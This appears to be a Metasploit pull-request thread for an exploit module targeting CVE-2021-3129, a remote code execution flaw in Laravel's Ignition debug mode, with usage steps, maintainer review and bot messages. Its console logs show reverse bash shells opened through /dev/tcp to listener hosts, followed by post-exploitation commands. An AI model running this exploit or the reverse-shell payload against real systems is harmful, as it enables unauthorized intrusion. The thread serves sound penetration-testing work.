Add module to CVE-2021-3129

[heyder]

This module exploits a vulnerability in Ignition before 2.5.2,
as used in Laravel and other products, allows unauthenticated
remote attackers to execute arbitrary code because of insecure
usage of file_get_contents() and file_put_contents().
This is exploitable on sites using debug mode with Laravel before 8.4.2.

This module has been tested successfully on Debian 10.7 (x86_64) with
kernel version 5.10.60.

Verification

List the steps needed to make sure this thing works

• Create the log file manually in /var/www/storage/logs/laravel.log
  if using the bellow mentioned container
• Start msfconsole
• use exploit/multi/php/ignition_laravel_debug_rc
• set RHOSTS
• set RPORT
• set LHOST
• exploit

Environment

This module was tested using a vulnerable docker container
as available on the vulnhub project. However this container doesn't come
with the required log file created. It needs to be created
manually in the path /var/www/storage/logs/laravel.log.

Even though the compose file from this container says laravel:8.4.2 on
my environment it was deployed with the version 8.26.1. I also didn't find the
release 8.4.2 in the Laravel repository.

Software versions

PHP 7.4.1
Laravel Framework 8.26.1
Ignition 2.5.1
Debian 10.7

Output

msf6 exploit(multi/php/ignition_laravel_debug_rce) > exploit

[+] bash -c '0<&65-;exec 65<>/dev/tcp/172.28.241.244/4444;sh <&65 >&65 2>&65'
[*] Started reverse TCP handler on 172.28.241.244:4444
[*] Checking component version to 172.28.240.1:8080
[*] Debug mode is enabled.
[*] Found PHP 7.4.15 running Laravel 8.26.1
[*] Found log file /var/www/storage/logs/laravel.log
[*] Command shell session 2 opened (172.28.241.244:4444 -> 172.28.240.1:56840 ) at 2022-02-08 11:32:12 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
php /var/www/artisan --version
Laravel Framework 8.26.1
head ../vendor/facade/ignition/CHANGELOG.md
# Changelog

All notable changes to `ignition` will be documented in this file

## 2.5.1 - 2020-11-13

- add support for LiveWire component urls

## 2.5.0 - 2020-10-27

uname -a
Linux 9f96df025a2b 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 GNU/Linux
cat /etc/debian_version
10.7
exit
[*] 172.28.240.1 - Command shell session 2 closed.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[bwatters-r7]

Test

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show options

Module options (exploit/multi/php/ignition_laravel_debug_rce):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   LOGFILE                                 no        Laravel log file absolute path
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
                                                     ing-Metasploit
   RPORT      80                           yes       The target port (TCP)
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(multi/php/ignition_laravel_debug_rce) > set verbose true
verbose => true
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set rhost 10.5.134.153
rhost => 10.5.134.153
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set rport 8080
rport => 8080
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(multi/php/ignition_laravel_debug_rce) > run

[+] bash -c '0<&100-;exec 100<>/dev/tcp/10.5.135.101/4444;sh <&100 >&100 2>&100'
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 10.5.134.153:8080
[*] Debug mode is enabled.
[*] Found PHP 7.4.15 running Laravel 8.26.1
[+] The target appears to be vulnerable.
[*] Trying to detect log file
[*] Found directory canditate /var/www
[*] Cheking if /var/www/storage/logs/laravel.log exists
[*] Found log file /var/www/storage/logs/laravel.log
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.134.153:40438 ) at 2022-02-14 16:31:29 -0600
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[bwatters-r7]

Hey there- thanks so much for your submission! I only have a few minor suggestions.

[bwatters-r7]

Release Notes

This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().